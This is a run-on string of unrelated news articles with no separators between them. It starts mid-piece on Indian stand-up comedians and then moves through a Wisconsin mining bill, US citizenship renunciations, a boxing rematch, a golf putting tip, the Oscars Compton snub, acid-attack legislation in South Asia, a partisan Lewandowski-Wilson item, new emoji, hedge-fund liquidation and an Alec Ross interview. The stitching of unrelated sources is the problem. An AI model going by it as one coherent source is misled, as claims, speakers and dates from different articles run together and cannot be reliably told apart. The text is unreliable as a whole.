He recognises that his strength is in the performance. “My acting background helps,” says the young man who has a Masters in Film & TV Production from the University of Bristol. Thakur is cocky as well as self-deprecating. “I was thrilled to get an audition call from Dharma Productions once… till I found out it was for the role of a eunuch. I did it, though. Fortunately, I did not get the part.”
A sedate, grown-up contrast to the effervescent Thakur is Delhi's Rajneesh Kapoor. His speech and hand movements are such that they produce a soothing effect. He could lend his voice to yoga CDs. Kapoor, who also does a comic strip for newspapers, has declared that his mission is clean comedy. His act at Zenzi is mostly about the habits of Delhi people—how they don't obey traffic rules, are aggressive, and use the term ‘healthy' for overweight women. “In Delhi, it ain't over till the healthy lady sings,” is one of Rajneesh's punchlines. He does not hammer in his punchlines, but gently floats them out so that the words linger on a while before trailing off. The last word is often stretched. “In Delhi, it ain't over till the healthy lady siiiinnggs…”
“Any open mic you go, there are jokes about bras, periods, masturbation. (But) I like a well-constructed joke,” Kapoor says. Audiences, he feels, are partly responsible for the heavy reliance on sex jokes. “You do a good joke on India-Pakistan relations, you barely get anything. So you say, ‘Let's talk about oral sex.' There is immediate laughter.”
But, he adds, “It's not that Indians like cheap jokes and nothing else. Jerry Seinfeld and Russell Peters are very popular in India. Their jokes are not always about sex. It proves that good writing works. Good writing is a bit of a stumbling block when it comes to Indian comedians. We need new performers. It is the usual suspects at every show. There is one bright newcomer, Sanjay Rajoura. He is a Jat boy with the background of an infotech career in the US. So he brings a new dimension [to comedy].”
Kapoor says he does not buy the theory that Indians are not funny. “As an art form, stand-up is new. We are going by the 20-word-set-up-followed-by-punchline formula. We need some story-telling. I think we'll be good at it.”
Of his own comic writing, Kapoor is confident. It's the rest of the package that needs attention. “I'm working on the performance part... George Carlin did not have the greatest lines, but he had great stage presence.”
On two occasions during the show at Zenzi, Mumbai comedian Aditi Mittal feigned a hunched back and tottered up to the stage to enact her popular Mrs Lutchuke routine. Mittal is a member of the visiting faculty at National College, where she teaches media studies, and St Xavier's College, where she teaches creative writing. Like her, the character of Mrs Lutchuke is a college teacher, but a Maharashtrian one who gives sex advice to students in a strong Marathi accent. She pronounces ‘boobs' like ‘books', without emphasis on the ‘oo'. Among her many tips is, “Don't fondle them like you are opening a bottle of jam.” She also demonstrates, with the help of a banana, the right way to use a condom. By her side is her assistant, Urvashi Phadnavis, played by Thakur. The act, almost entirely about sex, is a hit.
Like most comedians, Mittal, prone to using ‘haan ji' in real life conversations, finds humour in everything. “But I'm gravitating towards subjects that people do not normally talk about,” she says. That includes sex. “Observational humour is observational humour. If it is about sex, so be it. There is a difference between using something as a crutch and using something as a tool.”
Mittal thought of talking about sex through Mrs Lutchuke's uninhibited character because she did not like the way sex is portrayed in the media. “It is not as dramatic as portrayed on television, nor as sanitary as suggested by newspaper headlines like ‘48 per cent Indian youngsters are having sex'.”
Mittal has been doing Mrs Lutchuke for three months. She based it on a combination of her Marathi teachers and the grandmother of a Maharashtrian friend. “I find the Marathi accent hilarious, but also endearing. The language can be crass sounding, but it's from a good place.”
Mittal has also noticed the tendency of Indian comics to use the set-up-and-punchline formula. What will help them think beyond this, she feels, is greater exposure to global acts—many of which visit the Comedy Store in Mumbai, a sort of café dedicated to humour. “There are comics doing all kinds of stuff. One of my favourites is Mark Walker. He talks about songs you cannot strip to, and tries to strip to Heal the World. He also has a gay Spider-Man routine. It's hilarious. We are discovering new things.”
The last act of the day at Zenzi represented a brand of comedy that is perhaps the most respected: political and social satire. But not everyone can make a go of ripping the establishment to shreds. To do so, you need sustained anger towards everything around you.
Gursimranjeet Khamba has that anger. It fuels his diatribes against an Arnab Goswami, a Sania Mirza, NRI girls studying in unfancied overseas colleges, and “the one who recently left us only in a physical sense” (Sathya Sai Baba). It is a bit surprising that Khamba, a man who has made an impression with his informed, articulate and scathing English blogs, uses a fair amount of Hindi, especially the word ‘bhenchod', as part of his stand-up repertoire. But Khamba sets his own rules. At the conclusion of his act, he urged the audience to trust their own judgment and form their own opinions about things.
“There is a lot of snobbery in English stand-up. But some jokes work better in Hindi,” says the tall, thoughtful Sardar who greets your questions with a “Hmmm... sure” and has enrolled at Mumbai's Tata Institute of Social Sciences for a Masters in Media and Culture Studies.
Asked if trenchant social commentary should be the real objective of stand-up comedy, Khamba says, “I struggled with this at one point. I thought, ‘What's the point of making people laugh with the same sex jokes and fart jokes?'”
Now he seems to have achieved some middle ground. On the one hand, he says, “There needs to be an Indian voice. And you do need to make people laugh.” Yet, he maintains, “The anger is still there. The censorship issue, for example, has pissed me off. But the more you are suppressed, the harder you hit back. The same thing led to some great comics like Lenny Bruce and George Carlin. Hope it happens here too.”
One of Khamba's blogs is about the difference between North Indian and South Indian porn. At Zenzi too, he had a few sex jokes. He said one renowned Indian saint discovered that he could detach his legs while having sex.
Sex, evidently, isn't always overdone. “Some subjects get you cheap laughs,” says Khamba, “Arnab Goswami, Sreesanth, sex. These are fine as fillers. But it can't be your entire act. Where you come from also matters. In Delhi, there are comics from Ghaziabad and Faridabad. They do not have electricity for hours, and they talk about it, which is funny. Then there are other kids who only talk about sex—because that's their preoccupation.”
Assembly Republicans plan to introduce a bill next week designed to jump-start a company's plan to dig an iron mine in far northern Wisconsin, the chamber's top leader said Wednesday.
Speaker Jeff Fitzgerald, R-Horicon, said the GOP will release the language during a news conference next week, most likely on Thursday. Fitzgerald declined to elaborate on the bill's contents, saying he would wait until the news conference.
He said Republicans plan to hold a mandatory public hearing on the measure in two weeks, but it would likely take place in Milwaukee, which is more than 300 miles from the proposed mine site. He said he believes it makes sense to hold the hearing in southern Wisconsin because that region is home to several heavy equipment companies that would benefit if the mine became operational.
The Assembly jobs committee has already held an informational hearing in Hurley, a town near the proposed site.
Fitzgerald said the full Assembly could pass the measure when it returns from its holiday break next month.
“Hopefully when we come to the floor in January we can get something passed,” Fitzgerald said.
A company called Gogebic Taconite wants to mine iron ore in the Penokee Hills just south of Lake Superior. Environmentalists fear the operation would pollute one of the state's most pristine regions.
Company officials contend they'd be conscious of the environment and say the mine would create hundreds of jobs for the economically downtrodden region, but they want assurances of a clear end point in the state's rigorous permitting process before they go any further.
Republicans, eager for any chance to help Republican Gov. Scott Walker deliver on his campaign pledge to create 250,000 jobs in Wisconsin before the end of his first term, have been working for months on legislation that would streamline the mine permit process.
“I hope that they've listened to the comments from people around the state about not wanting environmental rollbacks or loss of public input,” said Amber Meyer Smith, program director for Clean Wisconsin, a group that advocates for clean air and water. “Those are the issues we'll be taking a very close look at in any bill.”
The Assembly measure would have to pass the state Senate before it could go to Walker for his signature, but that process could get complicated.
Sen. Neal Kedzie, R-Elkhorn, is leading a special Senate committee studying the mining permit process with an eye toward developing its own legislation. He said he expected Assembly Republicans would move first, but he wants a bill that will garner bipartisan support in the Senate, where Republicans hold only a one-vote majority. Whether the Assembly bill will generate that support remains to be seen, he said.
“My job on my committee is not to ramrod legislation through of any kind,” he said. “It's to produce something we know will be a legacy we can live with. Perhaps what is introduced next week in the Assembly may be the ticket. We'll see.”
Goodbye, Uncle Sam!
That's what 3,000 Americans chose to say last year, lining up at embassies around the world to renounce their citizenship. The numbers for 2013 represent a dramatic spike -- triple the average for the previous five years, according to a CNNMoney analysis of government data.
Some of the rush is coming from expats who are tired of dealing with complicated tax filings -- which are only getting worse than new regulations come into effect.
Unlike most countries, the U.S. taxes citizens on all income, regardless of where it is earned or where they reside. Reporting taxes can be so difficult that expats are often forced to seek expert help, which can cost thousands of dollars.
Related story: Americans turn in passports as new tax law hits
Brad Westerfield, a tax lawyer at Butler Snow, said that renunciations have increased following the implementation of a new disclosure law -- the Foreign Account Tax Compliance Act -- that targets overseas tax evasion.
The measure, approved by Congress in 2010, is aimed at recouping some of the hundreds of billions the government says it loses each year in unpaid taxes.
"They've become so complicated -- the increased filing obligations over the years," Westerfield said. "You see more people giving up their citizenship or relinquishing their green cards ... Individuals [are] wanting to simplify their financial affairs, and just pay tax and report to one jurisdiction."
Related story: U.S. expats cry foul over tax system
Westerfield said that the first wave of renunciations in 2010 coincided with a part of the law that requires individuals to report foreign assets worth as little as $50,000. That's in addition to a separate provision that forces Americans to disclose foreign bank holdings larger than $10,000.
Renunciations dipped in 2012, but now another part of the law is kicking in. The new provision requires financial institutions to report all foreign accounts held by Americans.
"People find that intrusive," Westerfield said. "Just because you live your life outside of the U.S., most of your assets are foreign assets. [Americans are] saying enough is enough."
The law has prompted some banks to kick out their American clients rather than comply. Penalties can be high if banks make a mistake reporting U.S.-held accounts, even if they are basic checking and savings accounts.
Related story: Banks lock out Americans over new tax law
Some Americans may be giving up their passports to protect their wealth. Doing so could raise legal questions -- it's illegal to renounce your U.S. status to avoid paying taxes, and giving up citizenship doesn't mean you're off the hook for back taxes.
"The U.S. used to be the 'Rolls-Royce' of destinations -- the land of opportunity," said Hong Kong-based immigration lawyer Eugene Chow. No longer, it seems. "Both naturalized and native-born American citizens are choosing to say goodbye to Uncle Sam today."
By Keith Idec
As expected, the WBA announced Wednesday it has ordered a Guillermo Rigondeaux-Moises Flores rematch.
The Panama City-based sanctioning organization's ruling came eight days after the result of their 122-pound title fight was changed from a first-round knockout win for Rigondeaux to a no-contest by the Nevada State Athletic Commission. The WBA gave representatives for Rigondeaux and Flores 30 days to come to an agreement on contractual terms for an immediate rematch.
Rigondeaux was declared the winner by first-round knockout June 17 at Mandalay Bay Events Center in Las Vegas, but the Rigondeaux left hand that ended the bout clearly landed after the bell. The NSAC voted unanimously June 26 to change the result to a no-contest because video and audio evidence proved Rigondeaux's punch connected after the bell sounded to end the first round.
Referee Vic Drakulich said at ringside after the fight that he didn't hear the bell ring and wasn't sure when Rigondeaux threw the punch. The NSAC had instant replays available at ringside, but didn't immediately change the result just before Andre Ward and Sergey Kovalev entered the ring for their light heavyweight championship rematch that night.
Mexico's Flores also threw at least one punch after the bell sounded and was criticized by members of Rigondeaux's team, media and fans for exaggerating how hurt he was from Rigondeaux's left hand. Flores fell flat on his back after Rigondeaux hit him late and remained on the canvas for several minutes.
Rigondeaux (17-0, 11 KOs, 1 NC), a Miami resident who won two gold medals for Cuba, retained his WBA super bantamweight title. Flores (25-0, 17 KOs, 2 NC) is the WBA's interim champion at 122 pounds and the mandatory challenger for Rigondeaux's title.
The 36-year-old Rigondeaux could surrender his title and move up 126 pounds for a higher-profile fight if he doesn't want to face Flores again.
Keith Idec is a senior writer/columnist for BoxingScene.com. He can be reached on Twitter @Idecboxing.
Use the putting aid you already have and take this quick test to improve your aim and accuracy
What it means
Golfers who are right-eye dominant tend to see the hole to the right of its true location. The reason is that they set up with their right eye too far inside the ball and the target line. Initially, they push their putts to the right. Then they adjust their stroke accordingly (outside to in) and then pull their putts to the left on a regular basis. (The opposite is true for those who are left-eye dominant if the left eye is out of position.)
You can read your putt's break and hit a perfect stroke, but still end up missing it because your eyes deceived you. Learn which of your eyes is dominant to account for this optical illusion.
About 70 percent of the population is right-eye dominant, which puts the trailing eye (that's the one farthest from the hole) in the driver's seat when putting. If this eye is not positioned properly, your view of the hole becomes distorted, lessening your chances of holing out. Not sure which eye is your dominant one? Take the following test.
The test
1. Take a toilet-paper tube and fix it over the ball so that both eyes can see it in the center of the tube.
2. Close your left eye. If the ball remains in the center of the tube (top photo), you're right-eye dominant. If the ball jumps out of the tube and out of your line of sight (bottom photo), you're left-eye dominant.
To set up correctly, follow this routine
Read your putt from behind the ball (left), crouching down so that your eyes are at the same height they'll be during the actual putt. This way, you don't confuse your brain and your initial read when you set up over the putt. The taller you stand, the farther away the hole appears.
Walk into the ball, aim the clubface and then take your stance, making sure to place your dominant eye directly over the ball and your target line. Your body should be parallel, or square, to the putt's starting line. Use the tube when practicing checking your eye position.
Once your eyes are over the target line, swivel your head to take one last look at the hole and then stroke away.
After scoring precursor nominations from the Producers Guild, Screen Actors Guild, and Writers Guild — plus a best-of-the-year citation from the American Film Institute — Straight Outta Compton felt destined to become one of this year's best picture nominees. Until it didn't: The blockbuster, which earned $160 million in the U.S. and scored mightily with critics around the country, was omitted from Thursday's Oscar nominations list to widespread dismay.
Compton wasn't alone in its snub. For the second straight year, every acting nominee at the Academy Awards is white, a fact that caused the hashtag #OscarsSoWhite to trend after the nominations last week. In the days since, Spike Lee — a recent recipient of an honorary Oscar — and actress-producer Jada Pinkett Smith have joined the chorus of voices asking for a boycott of the Oscar telecast due the lack of minority representation among nominees.
In his open letter to Hollywood, Lee called out the media in hopes someone would ask the Oscar nominees to relay their thoughts on the Academy's “all-white ballot”; as part of an ongoing look into the Oscars, EW asked six Academy members — all white, all male — to weigh in with their thoughts on the Straight Outta Compton snub.
RELATED: Oscars 2016: The Academy's Biggest Snubs
The members stem from various branches, from writer to director to editor to publicist to two producers, their work runs the gamut from laugh-out-loud comedies to heavy political thrillers, and their ages vary from early 40s to late 60s. Here they weigh in with their thoughts as to why the biopic about the rise and fall of rap group N.W.A. didn't land that coveted best picture nomination. (The film did receive an original screenplay nod.)
“Nobody can accuse the Academy of being racist — but they can be accused of being out of touch with the younger generation,” says the director. “Straight Outta Compton is a masterpiece, probably the best biopic since Amadeus — but many if not most of the Academy can't fathom songs like “F— the Police.' I know many members who wouldn't even see the film because it represented a culture that they detest or, more accurately, they assume they detest. Younger people, even those under 50, are not only fans of the music, but much more willing to try to empathize with the world depicted in the movie. When the Academy expands to an even younger demo, movies like Straight Outta Compton will stand a chance.”
“If we're being honest, my bet is most Academy members didn't see it,” says the producer. “I think the older members, those in their 60s and 70s, didn't think it was a movie for them, and they didn't watch it. It was one of the best-reviewed movies of the year. It was surprising how good it was, and I felt it should have been rewarded. I made sure it was on my list. But maybe it wasn't high enough.”
“We have no way of knowing why anything with a lot of support doesn't get in. Compton could have received 2,500 votes in the fourth or fifth slot, but if it doesn't have at least 350 first-place votes, it gets ignored,” says the publicist, citing the Academy's preferential ballot system, which puts greater emphasis on first-place votes. “I don't think the Academy needs to have its motives addressed, but the weighted balloting system may need to be reconsidered. There isn't a doubt in my mind that Compton got a lot of votes. The very fact that all the guilds voted for the film proves that. There just weren't enough first- or second-place votes to get it over the hump.”
“I'm sure it's a demographic question,” says the writer. “I remember how I used to say about the Emmys that you really felt like most of the voters were people who rooted for the Munsters in the '60s. I don't know what the turnover has been at the Oscars to recognize that kind of work. I loved that movie. I think it was startlingly well done. You watch it and go, ‘Oh my God, they completely nailed it.' It's so hard to do. It's very difficult to do music biopics. I'm fascinated by that. They found a way to talk about the music, talk about the culture, the politics, and the emotional conflicts to the band, the business. It's a much more difficult movie than people understand. I am never surprised about the nominations being ridiculous, because it's always silly. I don't look at it as a fair judgment on anybody's work, so I don't actually care. I know most of those people don't see half of the movies. I haven't seen every single movie being discussed. Who has that kind of time? Especially when you gotta watch Making a Murderer.”
“The screening where I saw it, it was very well-received. I can only surmise that it didn't have real broad support from the below-the-line groups but everyone really liked it,” says the editor, referring to the fact that it wasn't nominated by the editors guild, cinematographers guild, or the art director guilds in their best-of-the-year contests. “The cast was terrific. The editing was great. It was shot really well. I was really disappointed it didn't get in, but I think it's the system that's flawed. The Academy has increased its members by 20 percent in the last three years, but it's going to take a while to pay off.”
“I loved Straight Outta Compton. I took my teenage son, he loved it too,” says the writer-producer-director. “But I'm embarrassed to say, I kind of forgot about it when it came time to vote. We saw it when it was first released theatrically, last August. Love & Mercy, which was also released last summer, is another terrific film that slipped through the cracks. They're both deserving, but neither was a part of the pre-nom drumbeat that tends to narrow the voters' focus.
“For the record, my son and I loved Creed too, and I did vote for it for the best picture nom. I also thought Idris Elba should have been nominated for Best Actor this year. And the amazing young actor Abraham Attah in Beasts of No Nation might also have deserved a nod. I'm sorry they were excluded. But I don't think they were excluded because they were black, but more likely because they were in a movie that got very limited theatrical release and was very tough to watch.
“I'm acutely aware of the diversity concerns within the Academy, and I wish I had a genius idea to help solve it. But I don't. Any more than I have a notion on how to increase the ranks of black directors, writers, and stars in top-quality feature films. And any more than I can figure out why on a low-budget feature film set I recently visited, there was only one black crew member.
“I think employment is a bigger problem than awards, actually. An all-white ballot is the symptom; low minority hiring is the disease. Those of us in the industry, voters or not, need to do better!”
Additional reporting by Lynette Rice
(WOMENSENEWS)–Bangladesh was singled out from two neighboring countries for its strong measures to stop acid attacks on women in a Jan. 27 report.
In a study of the crime in Bangladesh, Cambodia and India, researchers found that Bangladesh had taken the most proactive approach to decreasing the attacks by enacting legislation, a no-bail policy for perpetrators and forming a national council to regulate corrosive solutions and enact a policy of treatment and rehabilitation for victims.
Whether the attacks follow a perceived wrongdoing or are simply the response of a spurned suitor, thousands of women in the South Asian region around Bangladesh have had sulphuric acid sprayed or poured onto their faces, eliminating facial features, causing blindness and fusing skin together, forcing them into a life of health problems and social isolation.
"This is a form of gender terrorism, I believe," Cornell International Human Rights Clinic Director Sital Kalantry said Thursday at New York City's Cornell Club in an event discussing the findings in advance of its official publication.
The study is based on two years of on-the-ground research and fact-finding conducted by four New York-based groups: Kalantry's Human Rights Clinic; Cornell Law School's Avon Global Center for Women and Justice; the New York City Bar Association; and the Virtue Foundation, which acts in a consultative capacity to the United Nations on global health care, education and empowerment initiatives. It was funded by a grant from the Avon Global Center for Women and Justice.
Difficulties in Enforcement
Bangladesh's women have yet to feel the full benefit of the new laws and policies. The density of the population in Bangladesh combined with a relative scarcity of police officers hinders investigations and prosecutions.
In Bangladesh, in the years between 2000 and 2009, there were 2,198 reported attacks but only 439 convictions, according to the study. However, the attacks in Bangladesh have waned, falling steadily from 367 in 2002 to 116 in 2009.
Producers of the report, entitled "Combating Acid Violence in Bangladesh, India and Cambodia," call it the first comprehensive study of the use of acids to maim, disfigure and punish women.
A search of Indian newspapers by the researchers found 153 reported cases in India between January 2002 and October 2010 and the Cambodian Acid Survivors Charity has counted 271 acid violence victims treated in hospitals in Cambodia between 1985 and 2010.
These figures from the report may not tell the whole story, as records of such assaults in these nations are not always kept and the crimes themselves are sometimes not reported, Kalantry said.
Looking Forward
In the next year the producers of the report plan to offer technical assistance based on data from the report and advice on what to do moving forward to governmental representatives of Cambodia, Bangladesh and India, should they ask for it, to help confront and change the culture of acid attacks, Kalantry said.
Kalantry is currently planning a forum to be held in New Delhi, India, in October where various women's health and rights nongovernmental organizations and possibly government representatives from the three nations studied–where acid attacks are relatively prevalent–can compare strategies and successes.
Victims often become social pariahs as some communities see them as bad omens. "Unlike rape, which can be hidden, this is on a woman's face," Kalantry said.
Corporations who produce or use acids in their products will also be recruited to help end the violence. Avon Executive Director Sara Lulo said at the Thursday event that the acids are readily available in Bangladesh, India and Cambodia and are used as cleaning products, in dyes for clothing and in batteries.
Better labeling of receptacles in which acids are sold could make a difference, Lulo said, which gives producers of the chemicals a way to join the fight against acid attacks.
Would you like to Comment but not sure how? Visit our help page at http://www.womensenews.org/help-making-comments-womens-enews-stories.
Would you like to Send Along a Link of This Story?
http://www.womensenews.org/story/the-world/110127/bangladesh-praised-reducing-acid-attacks
Karsten Strauss is a freelance journalist based in New York City.
For more information:
"Combating Acid Violence in Bangladesh, India, and Cambodia" report:
http://www.lawschool.cornell.edu/womenandjustice/upload/Combating-Acid-Violence.pdf
Corey Lewandowski Demands Rep. Frederica Wilson “Resign Immediately” and “Disappear” (Video)
Earlier this week Florida Rep. Frederica Wilson attacked President Donald Trump over his phone call to a grieving widow. Wilson accused President Trump of being cold and callous in his remarks to the widow of Sgt. La David Johnson.
President Trump denied the accusations.
Frederica then accused White House Chief of Staff John Kelly of being a racist for defending the Commander in Chief.
On Saturday former Donald Trump campaign manager Corey Lewandowski called on the Florida Democrat to immediately resign.
Corey Lewandowski: Look it's very simple. To say the fact that she had to look up the term in a dictionary to understand what an “empty barrel” means and to accuse a great Four Star Marine General who has given his entire life and his son's life to this country, is so out of bounds. She should resign immediately. She should disappear. And she should never be involved in public office again.
President Trump took to twitter to blast the #FakeNews media and wackadoodle Democrat Frederica Wilson in the same tweet!
I hope the Fake News Media keeps talking about Wacky Congresswoman Wilson in that she, as a representative, is killing the Democrat Party! — Donald J. Trump (@realDonaldTrump) October 21, 2017
We all know emojis are 👍 👌 and we use them all the⌚️ to express ourselves.
We all know emojis are 👍 👌 and we use them all the⌚️ to express ourselves.
🚨 BIG NEWS 🚨 The list of new emoji that may find their way onto your 📱 next year has been released!
The Unicode Consortium, the group of tech companies that oversees the system that converts computer code to readable text, has released a list of 67 emojis that have been accepted as candidates for potential inclusion into the official Unicode language. 😮😮😮
In May next year the Unicode Technical Committee will meet to determine which emojis will make the final cut and be released for use in June 2016.
You can read the full list here, but here's what the best of them might look like...
Shannon Stapleton / Reuters Bernard Madoff
Bernard Madoff's $50 billion Ponzi scheme continues to rock the financial world. But most hedge funds actually engage in similar  albeit legal  practices in the short run. In the past, these practices helped inflate their gains as well as hedge-fund managers' salaries and bonuses, but recently they helped bring about the failure of many major hedge funds.
At the heart of the difference is the distinction between realized and unrealized gains. Gains are realized when assets are liquidated to cash. For instance, if you buy a stock for $100 and it is currently trading at $200, you have made $100 in unrealized gains. If you sell it at $200, you have made $100 in realized gains. Most hedge funds do not regularly liquidate their entire portfolio, so they report unrealized gains to their investors and to the public. (See the top 10 scandals of 2008.)
Now comes the murkier part: Many assets  particularly those that unregulated hedge funds can trade  are not as liquid as stocks, so they do not always have a definite price on the market. Since a fund reports unrealized gains, it could easily get away with inflating profits. More specifically, the fund could use the most optimistic models to price its illiquid assets, which include mortgage-backed securities and other swaps. After all, economists disagree about how to value these assets, so the fund is not necessarily being dishonest in its assessment.
Madoff never even came close to realizing the gains he reported and paid out to some investors. Yet even funds with fairly accurate estimates of unrealized gains are guilty of engaging in similar Ponzi practices in the short term. Here's why:
Suppose some investors decide to withdraw their money from a hedge fund. The fund must liquidate the appropriate amount of its assets to pay these investors. Say the fund holds large positions in illiquid assets. The fund cannot immediately sell these assets, except at a fatal loss, so it would sell its more liquid assets. Given that the fund is more likely to inflate its estimation of the illiquid assets, it would seem that investors who withdraw early get the better returns over that time period. Sounds a bit like a Ponzi scheme, right?
Even in the most vanilla of trades, liquidation can impact the market price. With lightly traded securities, this can be magnified. For example, a fund might corner some asset by buying and buying and buying and then reporting a huge unrealized gain. But the moment the fund tries to sell and realize the gain (perhaps to pay off its last few investors), demand disappears, and the asset crashes. Again, investors withdrawing early got better returns over that time period than those who waited until later. (See the top 10 financial collapses of 2008.)
Every year hedge funds do have to liquidate part of their profits in order to pay their managers, traders and other support staff. Fund managers typically keep 20% of (unrealized) trading profits. But first they must realize that 20% by selling the liquid assets. If a fund is overestimating the value of the illiquid assets, then its manager's profit is grossly overestimated. In most cases, the profit is at least slightly overestimated because of slippage in the liquid assets. In other words, if a fund liquidated all profits, the supposed 20% taken out first would actually be larger than 20% of the total realized profit.
If hedge funds had to regularly liquidate assets, we would not see the spectacular returns reported in the past. One factor of the supposed success of hedge funds is their ability to report unrealized gains and to be flexible in liquidation, since investors who believe they are getting high returns are unlikely to withdraw their money. That was how Madoff was able to maintain his charade for so long.
Wonder why Chicago-based hedge fund Citadel is not allowing investors to withdraw their money until at least March? Citadel has already reported about 50% losses for its two largest funds. Remember: these are unrealized losses. If Citadel liquidated assets to pay out to investors, losses would be even greater. Barring a miracle, the first investors out would lose less than those going out later. But even in good times, the withdrawal of money from a hedge fund impinges its performance.
Hedge funds are designed to take in more and more investors' money. Then inefficiencies and performance distortions of withdrawing money for investors and profit-taking for managers are smoothed out. The recent failures in hedge funds, while rooted in the financial meltdown, have been further fueled by the lack of new investment as well as pressure from current investors to take their money and run. Regardless of a fund's investment strategy, liquidation tends to make unrealized gains smaller  and unrealized losses larger  when they are finally realized.
By design, hedge funds benefit managers more than investors. Since the liquidation of assets always results in slippage  the more that is sold, the worse the price  managers for every hedge fund always get the "best" 20% of the profit.
So you see, there could be a little Ponzi scheme in every hedge fund. It is inherent to the model of the modern hedge fund. The only way to avoid these schemes is to regularly liquidate all assets and allow all investors to decide what to do with their cash returns. In the past, this would have meant seemingly diminished returns. With returns seemingly high, investors did not complain about the status quo. Now, given that regular liquidation would mean more transparency and diminished losses, in recent days investors' opinions would likely differ.
See pictures of the stock market crash of 1929.
See pictures of the recession of 1958.
In Alec Ross's new book, The Industries of the Future, he takes a deep dive into the specific fields he believes will shape our economic future, including robotics and the codification of just about everything. The book is based in part on his four years serving as senior advisor for Innovation to then-Secretary of State Hillary Clinton, as well as on his travels, which took him the equivalent of “25 circumferences of the globe.”
Recently Knowledge@Wharton interviewed Ross about his book while he was on campus as an Authors@Wharton guest.
An edited transcript of the conversation follows.
Knowledge@Wharton: When you were coming up with the industries to highlight in the book, was it immediately obvious what would make sense to put in there? What was your process of deciding which ones to include or how to categorize what you were seeing into clear industry sectors?
Alec Ross: It was a long process, actually. My assistant totaled up my travel, and apparently over the last handful of years, I've traveled the equivalent of two roundtrips to the moon with a side trip to New Zealand. The process of identifying the eight to 10 specific industries that I profile in The Industries of the Future is a byproduct of that travel — 25 circumferences of the globe. Some of the ideas that I had going in didn't stick. Then there were things like the commercialization of genomics, which I would not have necessarily intuited would be a trillion-dollar industry in the future, but by virtue of my research, it emerged.
Knowledge@Wharton: One of the things I thought was really fascinating about the book is you see two different things at work here. You see emerging economies where they are developing industries from the ground up that are cutting-edge. You also see more developed economies where their economies were basically shaped on the innovations of the past, and they are having to retool. What were the lessons you took from each of those? Is it easier for one versus the other?
Ross: The process of imagination that becomes innovation, which becomes commercialization, is fairly similar country to country. But the problem is that [some] countries have the wherewithal — the access to capital, the employee base — to take something from imagination to reality, and others don't.
“Over the last handful of years, I've traveled the equivalent of two roundtrips to the moon with a side trip to New Zealand.”
In the most highly developed countries, you do have baked in a set of advantages that don't exist in frontier markets or in developing economies. More often than not, it's in the developed economies. It's in places like Silicon Valley where they're going to create entirely new platforms that billions of people will eventually use. Whereas in developing economies — at least to this point and it could change — it's been the case that what I see is building a tool, building an application, developing that solves a very specific problem as opposed to building platforms that serves hundreds of millions of people.
Knowledge@Wharton: So for those economies it's more about whether they can take the tool and really develop an industry around that or an industry around that type of innovation?
Ross: That's exactly right. I think about mobile payments and how mobile payments emerged in Kenya. The reason why mobile payments emerged in Kenya was in part because there weren't mainstream banks on Main Street in Nairobi. It was innovation born out of scarcity. But the interesting thing there is because it's so good and because it appeals to consumers around the world, it's something that can scale from developing economies into developed economies. So there are examples of that.
Knowledge@Wharton: When you look at developed economies, for example, you talk a little bit in the book about your background growing up in West Virginia and about what happened to the community when coal became not a dominant industry anymore, when it moved overseas to other places. I lived in a place very similar to that in Indiana, which had been an industrial economy, and one of the things that I found interesting is that the government tried to pivot to something new, to what was coming next. But you have this pushback from the population that they want the jobs back that were there before. They want it to be the way it was before because that was very sustainable, it made a good life for generations of people. With developed economies, how did you see governments or people trying to get beyond that?
Ross: One of the lessons of the past 40 years of globalization is that you can't click your heels together, and say, “There's no time like 1965.” It just doesn't work…. That kind of regressive worldview when it becomes a regressive set of policies tends to lead to nowhere. One of the reasons why I wrote The Industries of the Future, was as a response to how poorly the state of West Virginia did respond to globalization and technology-driven innovation. [They] clung on to coal even as coal became automated.
This is where leadership is necessary. People cannot curl into the fetal position and wish for the prosperity of yesterday. It's not the strongest of the species that survives or the most intelligent, but those most adaptable to change. That's as true in most highly developed Western economies as it is anywhere.
Knowledge@Wharton: In the book, you talk a little bit about how the people ask you, for example, “How does my community become Silicon Valley?” Your answer is they can't — that you can't be Silicon Valley because Silicon Valley had a special set of things that made it that way.
What you can do is take the deep knowledge in your own community and leverage that. You have a community like Detroit where their deep knowledge is in automobiles, and in some sense, that's become antiquated…. How do you pivot an industry like that that's very much based on the innovations of yesterday and focus them on some of these industries that you talk about in the book? Do you see economies that are doing that well?
“The process of imagination that becomes innovation, which becomes commercialization, is fairly similar country to country.”
Ross: First, let's go right back to Detroit…. In my opinion, the next generation of automobiles will be increasingly internet-connected, which will be driverless. [Detroit] ought to assert their own domain expertise in automotive so that they can be a part of that economy tomorrow.
Secondly, again sticking to Detroit, there are going to be emerging fields like drones. Marc Andreessen from the venture capital firm Andreesen Horowitz suggested that Detroit become Drone Valley. If you take the industry out of it — the car industry — but think about what the skills were that made Detroit what it was for as long as it was, that can lend itself to a set of future-oriented industries. When I think about the Rust Belt more broadly, I think about deep domain expertise in manufacturing. Supply chains are growing more sophisticated. Advanced manufacturing is growing more sophisticated. There is the emergence of 3D printing. That domain expertise in manufacturing in the Rust Belt could be turned to its advantage so long as it's oriented towards the industries of the future.
Knowledge@Wharton: Do you see that type of deep thinking going on in some of these economies like in the United States and Europe? Are there people out there that thinking about this that way? Is there enough thought being put into that.
Ross: I actually think there is. Most people who write books about the future are either wildly utopian or wildly dystopian. It's either, “Oh, we're going to live 150 years, happy, healthy, wealthy, wise and lack for nothing. Or it's written with sort of fists clenched and eyes closed, very angry. Life is much more up the middle.
When I think about your question here about our communities preparing themselves to pivot and leverage their domain expertise, I actually think, yes. Where I live now in Baltimore, there's a very strong focus on the commercialization of genomics, the life sciences based on the tremendous research institutions that are there. It's close to the NSA and the CIA and the Defense Department. So there's a big focus on cybersecurity. I do think that communities have grown smarter and smarter about mapping their assets and figuring out how to build industries around those assets.
“If you take the industry out of it — the car industry — but think about what the skills were that made Detroit what it was for as long as it was, that can lend itself to a set of future-oriented industries.”
Knowledge@Wharton: As robots and codification and all of these other industries that you identify in the book become more prominent, how do you feel that's going to change the world balance of power? How does that change the global economy and who has power and who doesn't?
Ross: That's a tremendous question. First of all, I'd put it into a certain kind of binary. The first is within the architecture of the 196 sovereign nation states, and the second is within those nation states, what kinds of individuals do well and what kinds of individuals do poorly.
You can live in a country that is prospering, but you can be doing very well or you could be doing very poorly. Or you could be living in a country that's floundering, and you might be able to be doing pretty well. The principle political and economic binary of the 20th century was right versus left. In the 21st century, I think it's open versus closed, defining open as upward economic mobility not confined to elites; social and cultural and religious norms not set from a central authority and broadly rights respecting for women, minorities of all type and what have you.
